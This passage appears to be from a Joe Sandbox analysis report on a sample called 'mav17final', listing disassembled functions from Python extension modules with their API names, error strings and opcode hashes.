                                                  • Instruction Fuzzy Hash: D8212721A09BC281EA549F2AE89427927A1EF89FE6F085135DB0E47764DF2CE451D320
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Buffer_$Arg_ArgumentBufferContiguousObject_ReleaseThread_acquire_lockThread_release_lockmemset
                                                  • String ID: argument$compress$contiguous buffer
                                                  • API String ID: 1731275941-2310704374
                                                  • Opcode ID: b138ca2d2723dab52cb10e3a74fac2df87b6dda8ec1f7609b2bdead44722ed7b
                                                  • Instruction ID: a2432adb877d1e6ca89f549caa85c98e4ec7967381ef783841c31bb8ba3dccca
                                                  • Opcode Fuzzy Hash: b138ca2d2723dab52cb10e3a74fac2df87b6dda8ec1f7609b2bdead44722ed7b
                                                  • Instruction Fuzzy Hash: 33111F62A18B8691EF10DF2DE8842A96371FB98BC4F558135DA4D43664DE2CE54AC700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Buffer_Err_ReleaseString$BufferObject_memcpy
                                                  • String ID: byte string too long$cannot delete attribute
                                                  • API String ID: 1128862751-688604938
                                                  • Opcode ID: c0fad4b2d32ac0ab3663af02738014edb070c5b9f2759e00e789a8b2334ff090
                                                  • Instruction ID: 58edea6ae6ca165b29bb94f5cf83ca03ea5307b1a1dbdc959e282da44fe4ca07
                                                  • Opcode Fuzzy Hash: c0fad4b2d32ac0ab3663af02738014edb070c5b9f2759e00e789a8b2334ff090
                                                  • Instruction Fuzzy Hash: 54016962A18EC2D1EB10CF69E8540792760FF85BEAF645132CB5E873A4DF2DE548C700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                  • String ID:
                                                  • API String ID: 349153199-0
                                                  • Opcode ID: 31b097c5beb5f15cde6c2b56eb33e70b4a1a94a0495c7f4a48947f332bb9daf1
                                                  • Instruction ID: dc715efa0a0f5b1ddb4efd5c366fe9734519adace6c8997fee474ba3786a83fa
                                                  • Opcode Fuzzy Hash: 31b097c5beb5f15cde6c2b56eb33e70b4a1a94a0495c7f4a48947f332bb9daf1
                                                  • Instruction Fuzzy Hash: 7081AE20E1C7C386FA50AFADE48127966A0AF867F6F546035DB4DA7396DE3CE845C700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dict_Item$CallCheckDeallocErrorFunctionMakeObject_ResultTuple_UpdateWith
                                                  • String ID:
                                                  • API String ID: 1807771726-0
                                                  • Opcode ID: 42a6a9498eb4336f8fb7f7e14a875b7f35efea189098be1472c8111e8b538fde
                                                  • Instruction ID: 4092b79292877b96c07d39c21c5aadffacb8dc86ac767eecca3c782b2885a304
                                                  • Opcode Fuzzy Hash: 42a6a9498eb4336f8fb7f7e14a875b7f35efea189098be1472c8111e8b538fde
                                                  • Instruction Fuzzy Hash: 6D615B21A08BC292FA958F29E9443B927A0BF45BE6F186435DF4D077A9DF7CE095C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: AdaptersAddressesTable
                                                  • String ID: %wS$(Oikk)$GetIfTable() syscall failed
                                                  • API String ID: 3665156436-3214263222
                                                  • Opcode ID: 3238560b630cb62fcc133b6affa0500c3083dc838b0a7e8171d660494cb522c0
                                                  • Instruction ID: ff153014ce5d3445e9999be8308d0fabc088632fcfd709363acb476556c3d2c7
                                                  • Opcode Fuzzy Hash: 3238560b630cb62fcc133b6affa0500c3083dc838b0a7e8171d660494cb522c0
                                                  • Instruction Fuzzy Hash: CE816A32A08AC295EE659F29A8083B96BA0FF65BE4F444035DB4F47794DF3CE446CB11
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
                                                  • String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
                                                  • API String ID: 1852475696-928371585
                                                  • Opcode ID: ca6cf6770a5e62d56dc10247fecd8c14e7675c1b430a8679457d8e3be21ba961
                                                  • Instruction ID: d973590822f973e82b2581121b1dd5b14d8310139aa4b54b5502fda92f660f16
                                                  • Opcode Fuzzy Hash: ca6cf6770a5e62d56dc10247fecd8c14e7675c1b430a8679457d8e3be21ba961
                                                  • Instruction Fuzzy Hash: 01519F62A19A8792EE24DB58E9916B96360FF44FC4F404172DF8E43B65DF3DE505E300
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF8BA246D1B,?,?,00000000,00007FF8BA246B4C,?,?,?,?,00007FF8BA246885), ref: 00007FF8BA246BE1
                                                  • GetLastError.KERNEL32(?,?,?,00007FF8BA246D1B,?,?,00000000,00007FF8BA246B4C,?,?,?,?,00007FF8BA246885), ref: 00007FF8BA246BEF
                                                  • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF8BA246D1B,?,?,00000000,00007FF8BA246B4C,?,?,?,?,00007FF8BA246885), ref: 00007FF8BA246C08
                                                  • LoadLibraryExW.KERNEL32(?,?,?,00007FF8BA246D1B,?,?,00000000,00007FF8BA246B4C,?,?,?,?,00007FF8BA246885), ref: 00007FF8BA246C1A
                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF8BA246D1B,?,?,00000000,00007FF8BA246B4C,?,?,?,?,00007FF8BA246885), ref: 00007FF8BA246C60
                                                  • GetProcAddress.KERNEL32(?,?,?,00007FF8BA246D1B,?,?,00000000,00007FF8BA246B4C,?,?,?,?,00007FF8BA246885), ref: 00007FF8BA246C6C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
                                                  • String ID: api-ms-
                                                  • API String ID: 916704608-2084034818
                                                  • Opcode ID: 936032d40fa96b032ac86a2d89c5a398f87e2a2d839e469644f99c68bf1566a7
                                                  • Instruction ID: 0771b9e065c90a80d88598f58949237012481d065dc9b33f3a9b18f847fe1681
                                                  • Opcode Fuzzy Hash: 936032d40fa96b032ac86a2d89c5a398f87e2a2d839e469644f99c68bf1566a7
                                                  • Instruction Fuzzy Hash: 6B31DC21B1EB4292EE26AB0AE9045B53394FF48FE4F594575EF2D0A790EF3CE145A300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$CallDict_Err_MakeMallocMem_MemoryObject_Update
                                                  • String ID: X{}
                                                  • API String ID: 3445980372-2140212134
                                                  • Opcode ID: 3f2902342c13d165ca5a04ad6b751020229967bc3c101f7663baa985dba562bd
                                                  • Instruction ID: 3128b050b6f6a3f2ebe16aed0699aede4295e08bb5f836d30b8bdbd26fc827c9
                                                  • Opcode Fuzzy Hash: 3f2902342c13d165ca5a04ad6b751020229967bc3c101f7663baa985dba562bd
                                                  • Instruction Fuzzy Hash: 56312A31A09BC285FB558F69E9442B927A0AF4ABF2F586134DB8D477A4DF3CE494C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$AttrCallable_CheckErr_LookupObject_String
                                                  • String ID: restype must be a type, a callable, or None
                                                  • API String ID: 1528254987-4008198047
                                                  • Opcode ID: 6452f5985481fdf810af319e620606f51f1d816ac9bc74436ba4aa13f9c82220
                                                  • Instruction ID: 1975a5e84f3a2d6c9cd0c80d8aadc5794b1d7bbee8079d641dcafcc33e7bebe2
                                                  • Opcode Fuzzy Hash: 6452f5985481fdf810af319e620606f51f1d816ac9bc74436ba4aa13f9c82220
                                                  • Instruction Fuzzy Hash: EA311C22F09B8681EB958F6DE55037927A0EF46BF6F18A230CB4E467A4DE2CE455C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DeallocString$AppendBytes_Err_FromList_Size
                                                  • String ID: Unable to allocate output buffer.$avail_out is non-zero in _BlocksOutputBuffer_Grow().
                                                  • API String ID: 1563898963-3455802345
                                                  • Opcode ID: 9b026c52384d1bde9e7588ce781edc70c1283e8086e1dddbc8207b2c901252c2
                                                  • Instruction ID: 6d304ea10122de307ea4596ba87b4384328a026709fb82eca05caca142f7fd89
                                                  • Opcode Fuzzy Hash: 9b026c52384d1bde9e7588ce781edc70c1283e8086e1dddbc8207b2c901252c2
                                                  • Instruction Fuzzy Hash: 9A314B21B09A9682EE14CF19E5501386374FB58FE4B545A31EF6E477E4DF2CE45A8300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandleProcess$AffinityErrorLastMaskOpen
                                                  • String ID: OpenProcess$automatically set for PID 0
                                                  • API String ID: 1247319315-2746090705
                                                  • Opcode ID: 84f84ba0d819ed7d28646b2aec9722d2b2c98135e418c2544e8b5fc9a2d70430
                                                  • Instruction ID: daff56ebe09004aeac0dc40ecd47d4e021ac928488347e2de5472d41cdfcb7a4
                                                  • Opcode Fuzzy Hash: 84f84ba0d819ed7d28646b2aec9722d2b2c98135e418c2544e8b5fc9a2d70430
                                                  • Instruction Fuzzy Hash: 55213061B0C6C782FF509F29F8441B96BA0BF687E4F444035DB0D426A5EE3CE4468700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Handle$CloseProcess$CountErrorLastOpen
                                                  • String ID: OpenProcess$automatically set for PID 0
                                                  • API String ID: 109548231-2746090705
                                                  • Opcode ID: b0a74a816b2bb0a02e08803a7b868286cc248dab37cbd7a49b6cc2d8dbfba7cb
                                                  • Instruction ID: a33078c0f798c9d0a1067c3a6ce8023fc7486bf994ef4533aeaacbb1c95fe51a
                                                  • Opcode Fuzzy Hash: b0a74a816b2bb0a02e08803a7b868286cc248dab37cbd7a49b6cc2d8dbfba7cb
                                                  • Instruction Fuzzy Hash: E7215321B1C68782FF549F2DF8842796BA0BFA87E1F444435DB1E46695EE2CE8478700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandleProcess$AffinityErrorLastMaskOpen
                                                  • String ID: OpenProcess$automatically set for PID 0
                                                  • API String ID: 1247319315-2746090705
                                                  • Opcode ID: f36405a96407f5c48ff1cffe12eb7f8d1e535dd237c7df921e92d8a611183e99
                                                  • Instruction ID: 46fa7b2bed2cc9bb6c48239a2f8b8b854c1e3d1eaddae641222f3864abc8423a
                                                  • Opcode Fuzzy Hash: f36405a96407f5c48ff1cffe12eb7f8d1e535dd237c7df921e92d8a611183e99
                                                  • Instruction Fuzzy Hash: B7212F21B1868782FE549F2EF8942796BA1BFA8BE0F445035DB1E43795EE2CE4568700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$ClassErrorLastOpenPriorityProcess
                                                  • String ID: OpenProcess$automatically set for PID 0
                                                  • API String ID: 3190793011-2746090705
                                                  • Opcode ID: 0d9471339f1e42a836f56fddc6e67cca189d308aee44e2c9fee917e893e7b78b
                                                  • Instruction ID: d12eb60a518b9bece97dd77f89e2f37fb4f5dedaff425ecc3e073c91ba3d2ebb
                                                  • Opcode Fuzzy Hash: 0d9471339f1e42a836f56fddc6e67cca189d308aee44e2c9fee917e893e7b78b
                                                  • Instruction Fuzzy Hash: F5215321B0868782FF549F2EF8841796BA0BFA8BE0F485035DB1E47694DE2CE4878700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseHandle$ClassErrorLastOpenPriorityProcess
                                                  • String ID: OpenProcess$automatically set for PID 0
                                                  • API String ID: 3190793011-2746090705
                                                  • Opcode ID: 5ed11432822b2ab59c5525e06913b4ea131950c1beaa857bc16ccadd49b4e221
                                                  • Instruction ID: a7a89bc6611d2b181eafbfc9a1309b0be9f6665c7c66bdde3ddbfca973315d23
                                                  • Opcode Fuzzy Hash: 5ed11432822b2ab59c5525e06913b4ea131950c1beaa857bc16ccadd49b4e221
                                                  • Instruction Fuzzy Hash: DE214221F1868782FF559F3EF8541795AA1BFA87E0F485035DB1E82695EE2CE8478700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CharErr_Unicode_Wide$FormatString
                                                  • String ID: can't delete attribute$string too long$unicode string expected instead of %s instance
                                                  • API String ID: 530648689-1577475929
                                                  • Opcode ID: 54871f426e13d62f20164b13e72e16cb3eb4130456bf9d3dcc44f832ca140448
                                                  • Instruction ID: bb5d0fd9a5c2d09a8eb7fddce825e67a35475bcbd983c74b127afe78d197e4ea
                                                  • Opcode Fuzzy Hash: 54871f426e13d62f20164b13e72e16cb3eb4130456bf9d3dcc44f832ca140448
                                                  • Instruction Fuzzy Hash: B0213A61B0CB8282EA40CF69E5801B96761BF85FE2F585536DB0D47768CF2CE445C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Long$Long_MaskUnsigned
                                                  • String ID: _ctypes/cfield.c pymem$unicode string or integer address expected instead of %s instance
                                                  • API String ID: 1805849926-901310697
                                                  • Opcode ID: 2ce16603c6b5fb28991612c657e35fb793e2d5932663eadf79fd1512b973919a
                                                  • Instruction ID: 4e1087973d4edae19115757ad5be9f6d11511a5cf81da1063b2d959eaf9a7f1f
                                                  • Opcode Fuzzy Hash: 2ce16603c6b5fb28991612c657e35fb793e2d5932663eadf79fd1512b973919a
                                                  • Instruction Fuzzy Hash: DB11EF62A09FC291EA448F1DE8542782B71BF59BE6F546436DB4E47354EF3CE465C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Eval_ThreadThread_acquire_lock$Err_RestoreSaveStringThread_release_lockmemmove
                                                  • String ID: End of stream already reached
                                                  • API String ID: 4192957916-3466344095
                                                  • Opcode ID: 9d24e192cd5e41aae34a11841e36e0bc5166bdf8702469d9357772ef0d70671f
                                                  • Instruction ID: adc327de9edfa78a92e601dc295ba21b4cf0366cb5c954a7e433ba870a84c9f7
                                                  • Opcode Fuzzy Hash: 9d24e192cd5e41aae34a11841e36e0bc5166bdf8702469d9357772ef0d70671f
                                                  • Instruction Fuzzy Hash: 4E11F866A18A8296EE14DF6AE954269A774FB88FC4F084031DF5E43765CF3CE45AC310
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Eval_ThreadThread_acquire_lock$RestoreSaveThread_release_lock
                                                  • String ID: Compressor has been flushed
                                                  • API String ID: 1906554297-3904734015
                                                  • Opcode ID: 4f10c9a98a270c81542dec47670a47e5c1056ddde1cac534f6d7ef28f75aec1e
                                                  • Instruction ID: 7d1b6395c6fd282176b252082ac702063d7391978b89c733a0c227a9f19fc1ae
                                                  • Opcode Fuzzy Hash: 4f10c9a98a270c81542dec47670a47e5c1056ddde1cac534f6d7ef28f75aec1e
                                                  • Instruction Fuzzy Hash: CA11C271A08A8292EE10DF6AE9841696375FB99FC5B049432DF4E47B54CF3CE49AC350
                                                  APIs
                                                  • PyThread_acquire_lock.PYTHON311(?,?,?,00007FF8B9098336), ref: 00007FF8B9098E36
                                                  • PyThread_release_lock.PYTHON311(?,?,?,00007FF8B9098336), ref: 00007FF8B9098E68
                                                  • PyErr_SetString.PYTHON311(?,?,?,00007FF8B9098336), ref: 00007FF8B9098E98
                                                    • Part of subcall function 00007FF8B9098364: PyType_GetModuleState.PYTHON311(?,?,?,?,?,?,?,00007FF8B9098E5E,?,?,?,00007FF8B9098336), ref: 00007FF8B909839F
                                                    • Part of subcall function 00007FF8B9098364: PyBytes_FromStringAndSize.PYTHON311(?,?,?,?,?,?,?,00007FF8B9098E5E,?,?,?,00007FF8B9098336), ref: 00007FF8B90983B3
                                                    • Part of subcall function 00007FF8B9098364: PyList_New.PYTHON311(?,?,?,?,?,?,?,00007FF8B9098E5E,?,?,?,00007FF8B9098336), ref: 00007FF8B90983C9
                                                    • Part of subcall function 00007FF8B9098364: PyEval_SaveThread.PYTHON311(?,?,?,?,?,?,?,00007FF8B9098E5E,?,?,?,00007FF8B9098336), ref: 00007FF8B9098417
